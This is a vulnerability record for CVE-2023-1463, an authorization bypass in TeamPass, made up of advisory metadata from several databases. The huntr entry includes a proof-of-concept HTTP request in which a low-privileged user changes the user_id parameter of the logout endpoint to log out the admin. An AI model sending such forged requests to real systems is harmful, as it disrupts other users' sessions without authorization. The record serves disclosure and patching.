Description
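Authorization Bypass Through User-Controlled Key (CWE-639) in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23. According to the huntr report referenced below, a low-privileged user can log out any other user, including the admin, by changing the user_id parameter of the logout request. Versions from 3.0.0.23 onward are not listed as affected.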
Affected Software
Related
{"id": "CVE-2023-1463", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2023-1463", "description": "Authorization Bypass Through User-Controlled Key in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "published": "2023-03-17T12:15:00", "modified": "2023-04-26T16:15:00", "epss": [{"cve": "CVE-2023-1463", "epss": 0.00044, "percentile": 0.08492, "modified": "2023-06-03"}], "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 5.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-1463", "reporter": "security@huntr.dev", "references": ["https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516"], "cvelist": ["CVE-2023-1463"], "immutableFields": [], "lastseen": "2023-06-03T17:36:49", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-86JQ-PWGX-6VRQ"]}, {"type": "huntr", "idList": ["F6683C3B-A0F2-4615-B639-1920C8AE12E6"]}, {"type": "osv", "idList": 
["OSV:GHSA-86JQ-PWGX-6VRQ"]}, {"type": "veracode", "idList": ["VERACODE:39911"]}]}, "score": {"value": 5.6, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "teampass", "version": 3}]}, "epss": [{"cve": "CVE-2023-1463", "epss": 0.00044, "percentile": 0.11105, "modified": "2023-05-02"}], "vulnersScore": 5.6}, "_state": {"dependencies": 0, "score": 1685814097, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "10bca8c523616978df8d284271510b78"}, "cna_cvss": {"cna": "huntr.dev", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "score": 6.3}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-639"], "affectedSoftware": [{"cpeName": "teampass:teampass", "version": "3.0.0.23", "operator": "lt", "name": "teampass"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:teampass:teampass:3.0.0.23:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.0.23", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "name": "https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516", "name": "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516", "refsource": "MISC", "tags": ["Patch"]}], "product_info": [{"vendor": "nilsteampassnet", "product": "nilsteampassnet/teampass"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"type": "CWE", "lang": "en", "description": "CWE-639 Authorization Bypass Through User-Controlled Key", "cweId": "CWE-639"}]}], "exploits": []}
{"osv": [{"lastseen": "2023-04-11T01:35:09", "description": "Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-17T12:30:40", "type": "osv", "title": "Improper Authorization in nilsteampassnet/teampass", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2023-1463"], "modified": "2023-04-11T01:35:04", "id": "OSV:GHSA-86JQ-PWGX-6VRQ", "href": "https://osv.dev/vulnerability/GHSA-86jq-pwgx-6vrq", "cvss": {"score": 0.0, "vector": "NONE"}}], "huntr": [{"lastseen": "2023-06-03T18:25:43", "description": "# Description\nAn IDOR vulnerability allows a low-level user to log out everyone in the system by changing the user ID.\n\n # Proof of Concept\nStep 1: Log in as admin\n\nStep 2: Go to user and add a user. 
Set role to Default.\n\nStep 3: Login as the new user.\n\nStep 4: Logout the user\n\n\n```\nGET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nReferer: http://localhost/teampass/index.php?page=items\nCookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\n```\nChange the *user_id* to any other id. For this example, we use 1 as *admin* user_id\n\nBelow is the response of the request submitted at above.\n\n```\nHTTP/1.1 200 OK\nDate: Tue, 28 Feb 2023 07:25:00 GMT\nServer: Apache/2.4.54 (Debian)\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nVary: Accept-Encoding\nContent-Length: 526\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n\n <script type=\"text/javascript\" src=\"../../plugins/store.js/dist/store.everything.min.js\"></script>\n <script language=\"javascript\" type=\"text/javascript\">\n <!--\n // Clear localstorage\n store.remove(\"teampassApplication\");\n store.remove(\"teampassSettings\");\n store.remove(\"teampassUser\");\n store.remove(\"teampassItem\");\n sessionStorage.clear();\n \n setTimeout(function() {\n document.location.href=\"../../index.php\"\n }, 1);\n -->\n </script>\n```\nStep 5: Admin has logged out", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", 
"integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-02-28T07:46:06", "type": "huntr", "title": "IDOR Vulnerability Allow Low-Level User Logout Everyone Includes Admin", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-03-17T10:37:28", "id": "F6683C3B-A0F2-4615-B639-1920C8AE12E6", "href": "https://www.huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6/", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}], "veracode": [{"lastseen": "2023-06-03T19:50:50", "description": "nilsteampassnet/teampass is vulnerable to Improper Authorization. 
The vulnerability allows an attacker with low-level privileges to log everyone out, including the admin, due to an Insecure Direct Object Reference (IDOR) via the user ID.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-23T00:27:22", "type": "veracode", "title": "Improper Authorization", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-04-26T18:18:36", "id": "VERACODE:39911", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-39911/summary", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}], "github": [{"lastseen": "2023-06-03T20:12:26", "description": "Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-17T12:30:40", "type": "github", "title": "Improper Authorization in nilsteampassnet/teampass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-03-23T18:20:49", "id": "GHSA-86JQ-PWGX-6VRQ", "href": "https://github.com/advisories/GHSA-86jq-pwgx-6vrq", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}]}